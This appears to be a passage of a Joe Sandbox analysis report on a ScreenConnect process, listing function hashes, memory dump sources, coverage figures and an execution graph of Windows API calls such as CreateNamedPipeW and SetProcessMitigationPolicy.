                                                                                                              • Instruction Fuzzy Hash: 0BF02741B28D4A4FE798BB6C14E61F96281EF9425479440FAD00DCB18FCC5CD9868390
                                                                                                              Function 00007FFD34724E59 Relevance: .0, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5f03c6324a557151ebfe4ecb605012a3018d9c743cef3b94efe95ab3b430be38
                                                                                                              • Instruction ID: 315afaf3a161ed8d972579d96f5a3218cabcda69c898dca20c0eed775b34e8c6
                                                                                                              • Opcode Fuzzy Hash: 5f03c6324a557151ebfe4ecb605012a3018d9c743cef3b94efe95ab3b430be38
                                                                                                              • Instruction Fuzzy Hash: D1F0BE92E4E3C34AF7AA133919B12747EA18F47240F4E40FBC28ACA0D3DD5CA885D352
                                                                                                              Function 00007FFD347243F9 Relevance: .0, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d59b3ddc8805485c801cb4a931e8f1ca1ae06242374abee498d5ab2ed77c6c14
                                                                                                              • Instruction ID: 086df0c554899e5e0aa0c816cb7333ebcfd906691830c4633475098f5d233493
                                                                                                              • Opcode Fuzzy Hash: d59b3ddc8805485c801cb4a931e8f1ca1ae06242374abee498d5ab2ed77c6c14
                                                                                                              • Instruction Fuzzy Hash: B1F09631A0DB894FD366A774846A1A67F71FF46200B4900FAD949C7193DE39A9058B81
                                                                                                              Function 00007FFD347209B1 Relevance: .0, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0dca6d3bd96aeed108f956b8012f8daea4e5f56fdc391bba83138f0ee8d092c7
                                                                                                              • Instruction ID: e34cc247cf0b44e2fd440613a9ea01d2297bfe18875cdc338ca9d7057818cc19
                                                                                                              • Opcode Fuzzy Hash: 0dca6d3bd96aeed108f956b8012f8daea4e5f56fdc391bba83138f0ee8d092c7
                                                                                                              • Instruction Fuzzy Hash: DAE0D86150F3D40FDB56973484A88E13FA0DE1722030900EBD681CF073E518864AD751
                                                                                                              Function 00007FFD34723E9A Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 68c3bd5c748716afcfc447ac47a82d836fd673e75ab5a7a82ed8bad7123eb114
                                                                                                              • Instruction ID: 2e5a263a6cc8e11264d667615124ad291124c63871cc7d4872a87c04f71a7582
                                                                                                              • Opcode Fuzzy Hash: 68c3bd5c748716afcfc447ac47a82d836fd673e75ab5a7a82ed8bad7123eb114
                                                                                                              • Instruction Fuzzy Hash: 40F0303150DBCC8FCB42EB6498748D5BFB0EE57310B0500D7D549CB0A3D6289D58CB92
                                                                                                              Function 00007FFD34724E70 Relevance: .0, Instructions: 24COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 90c43ab374a83431b766d6309d2b478e2590548326f15b34d1d0cedac4b22b58
                                                                                                              • Instruction ID: c7cd22eb7614aa2ea27e3c2f0135a871e90d75333f1a9f4a297af93e48b3aea5
                                                                                                              • Opcode Fuzzy Hash: 90c43ab374a83431b766d6309d2b478e2590548326f15b34d1d0cedac4b22b58
                                                                                                              • Instruction Fuzzy Hash: DCE0C266F4C61342FBAC627579F13B970C18F4A350F49807A951EC50C9CE6CACC0E191
                                                                                                              Function 00007FFD3472BF29 Relevance: .0, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 347f0b7135f5e5c5f2d18436f12486f5e8780fa3befab43a2867de5049558438
                                                                                                              • Instruction ID: feecda814065343fe0349b719dfa3628ddb1bac8a0a7acbef9890db5ad9ea0d1
                                                                                                              • Opcode Fuzzy Hash: 347f0b7135f5e5c5f2d18436f12486f5e8780fa3befab43a2867de5049558438
                                                                                                              • Instruction Fuzzy Hash: 9DE0127161CA494FE784DB0CD4E29A6F7D0FB98394F40067EE04DD2254DA69E6818741
                                                                                                              Function 00007FFD34722914 Relevance: .0, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0e2a14db6a487908dc47464bdef2e08ca689927f5ad23e0348041c9f50b92fac
                                                                                                              • Instruction ID: 518e6a0dd4e181f27c923de6a20148d9ea8eadcb76f5687aff6479b41275f261
                                                                                                              • Opcode Fuzzy Hash: 0e2a14db6a487908dc47464bdef2e08ca689927f5ad23e0348041c9f50b92fac
                                                                                                              • Instruction Fuzzy Hash: 43C09B14F1C54A47F145EB2444E11BE21527FC9205B524435D10DC118BCD7CF501B585

                                                                                                              Non-executed Functions

                                                                                                              Function 00007FFD3472B581 Relevance: .3, Instructions: 318COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.4038347317.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_7ffd34720000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d76afac1e650475ba7e3295e8fdefa6e9c986a2f192fa6ce9471c63227a2a203
                                                                                                              • Instruction ID: 293d8893b71151a0d9d10230b0ca9a87cafca06211a6e253c1bdbf6ec36f9f22
                                                                                                              • Opcode Fuzzy Hash: d76afac1e650475ba7e3295e8fdefa6e9c986a2f192fa6ce9471c63227a2a203
                                                                                                              • Instruction Fuzzy Hash: 44A15CB2E0E2968BE71D5E3858AE1F43B94DF43395F0400BED249C6492DB1D350BD6D2

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:11.8%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:16
                                                                                                              Total number of Limit Nodes:2
                                                                                                              execution_graph 16201 7ffd34709314 16204 7ffd3470931d 16201->16204 16202 7ffd347094d3 GlobalMemoryStatusEx 16203 7ffd347094e5 16202->16203 16204->16202 16205 7ffd34709412 16204->16205 16214 7ffd343f8014 16216 7ffd343f801d 16214->16216 16215 7ffd343f8082 16216->16215 16217 7ffd343f80f6 SetProcessMitigationPolicy 16216->16217 16218 7ffd343f8152 16217->16218 16206 7ffd343f3662 16207 7ffd34415670 ConnectNamedPipe 16206->16207 16209 7ffd34415722 16207->16209 16210 7ffd343f3642 16211 7ffd344154d0 CreateNamedPipeW 16210->16211 16213 7ffd34415603 16211->16213

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD34709314 Relevance: 1.8, APIs: 1, Instructions: 273COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2282286283.00007FFD34700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd34700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: GlobalMemoryStatus
                                                                                                              • String ID:
                                                                                                              • API String ID: 1890195054-0
                                                                                                              • Opcode ID: e238dfed77471d8d009fc2d0db2550dddfd5667d511fa26e5a49a06e417d8196
                                                                                                              • Instruction ID: c4fb7624a134fcf7d993b3515bd5eff0bd073733678d251fa59e0d5f652ce76f
                                                                                                              • Opcode Fuzzy Hash: e238dfed77471d8d009fc2d0db2550dddfd5667d511fa26e5a49a06e417d8196
                                                                                                              • Instruction Fuzzy Hash: 708129F1A0E6898FE765C76888656BA7FE0EF53320F0401BAE14DC7593DA5C740A9BC1
                                                                                                              Function 00007FFD343F8014 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2271595758.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd343f0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MitigationPolicyProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 1088084561-0
                                                                                                              • Opcode ID: 8bbe00c569b2eb2b297e8c33caefdad02131b6272d3aa811c57a2621a60e440f
                                                                                                              • Instruction ID: 4a775abcc2faebab9ee85984b6d502b0af0ddbf4ade3ff46c9e99a12fea6888b
                                                                                                              • Opcode Fuzzy Hash: 8bbe00c569b2eb2b297e8c33caefdad02131b6272d3aa811c57a2621a60e440f
                                                                                                              • Instruction Fuzzy Hash: B4512A31D0CB494FDB29AFA8985A5E97BE0EF56310F04017FE489C3192DF78A856C791
                                                                                                              Function 00007FFD343F3642 Relevance: 1.7, APIs: 1, Instructions: 171pipeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2271595758.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd343f0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2489174969-0
                                                                                                              • Opcode ID: e1cbd764efa81a3194e5a098481612e7c6a87b01c6d4cc368f1a75bd900b5cf1
                                                                                                              • Instruction ID: f3eb629cbc8b6b47557acfa591948e10fb20317266b380f03e4ff63c0bb18f25
                                                                                                              • Opcode Fuzzy Hash: e1cbd764efa81a3194e5a098481612e7c6a87b01c6d4cc368f1a75bd900b5cf1
                                                                                                              • Instruction Fuzzy Hash: DA518D7191CA1C8FDB68EF589845BE9BBE0FB59710F1442AEE04ED3241CB70A845CBC1
                                                                                                              Function 00007FFD343F3662 Relevance: 1.6, APIs: 1, Instructions: 121pipeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2271595758.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd343f0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConnectNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2191148154-0
                                                                                                              • Opcode ID: 779a719b9321aa4e43701a721e2cc1bf61f44cb8afb31d8b30e0f7282cab516e
                                                                                                              • Instruction ID: 90cf30583e7e733233267b1a0bad029c76fa3e18ef67d47f060480689d61b4de
                                                                                                              • Opcode Fuzzy Hash: 779a719b9321aa4e43701a721e2cc1bf61f44cb8afb31d8b30e0f7282cab516e
                                                                                                              • Instruction Fuzzy Hash: CF315C70A08A1C8FDB58EF98D849BEDB7F1FB59311F00826AD04DD7255DB74A885CB81
                                                                                                              Function 00007FFD343F3AA2 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2271595758.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd343f0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MitigationPolicyProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 1088084561-0
                                                                                                              • Opcode ID: 0bf57c23b8800a5e75f495ac6863abdc9b14dcd4596c4ae9b5641276af7fe57d
                                                                                                              • Instruction ID: 211c46e843db1bdd8d075033115c582718a8c86cba72848948c122a31fb735f8
                                                                                                              • Opcode Fuzzy Hash: 0bf57c23b8800a5e75f495ac6863abdc9b14dcd4596c4ae9b5641276af7fe57d
                                                                                                              • Instruction Fuzzy Hash: D821D731918B188FDB28AF9C984A6F9B7E0EB55711F00422EE049D3251DB74B8458B91